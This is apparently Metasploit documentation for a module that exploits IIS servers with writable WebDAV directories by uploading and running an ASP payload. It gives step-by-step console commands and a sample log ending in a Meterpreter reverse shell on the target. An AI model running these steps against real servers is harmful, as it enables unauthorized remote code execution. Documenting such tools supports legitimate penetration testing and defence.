h00die
1.8 KiB
Executable File
1.8 KiB
Executable File
Vulnerable Application
This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request.
IMPORTANT: The target IIS machine must meet these conditions to be considered as exploitable:
- It allows 'Script resource access'.
- It allows Read and Write permission.
- It supports ASP.
WebDAV
Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol (HTTP) that allows clients to perform remote Web content authoring operations. WebDAV is defined in RFC 4918 by a working group of the Internet Engineering Task Force.
Verification Steps
- Do:
use exploit/windows/iis/iis_webdav_upload_asp - Do:
set payload windows/meterpreter/reverse_tcp - Do:
set LHOST [IP] - Do:
set RHOST [IP] - Do:
set PATH / [PATH] - Do:
run
Scenarios
msf > use exploit/windows/iis/iis_webdav_upload_asp
msf exploit(iis_webdav_upload_asp) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(iis_webdav_upload_asp) > set RHOST 172.16.176.54
RHOST => 172.16.176.54
msf exploit(iis_webdav_upload_asp) > set LHOST 172.16.176.56
LHOST => 172.16.176.54
msf exploit(iis_webdav_upload_asp) > set path /upload/test.asp
path => /upload/test.asp
msf exploit(iis_webdav_upload_asp) > exploit
[*] Started reverse handler on 172.16.176.56:4444
[*] Uploading 613830 bytes to /upload/test.txt...
[*] Moving /upload/test.txt to /upload/test.asp...
[*] Executing /upload/test.asp...
[*] Sending stage (770048 bytes) to 172.16.176.54
[*] Deleting /upload/test.asp, this doesn't always work...
[!] Deletion failed on /upload/test.asp [403 Forbidden]
meterpreter > getuid
Server username: JUAN-C0DE875735\IWAM_JUAN-C0DE875735
meterpreter >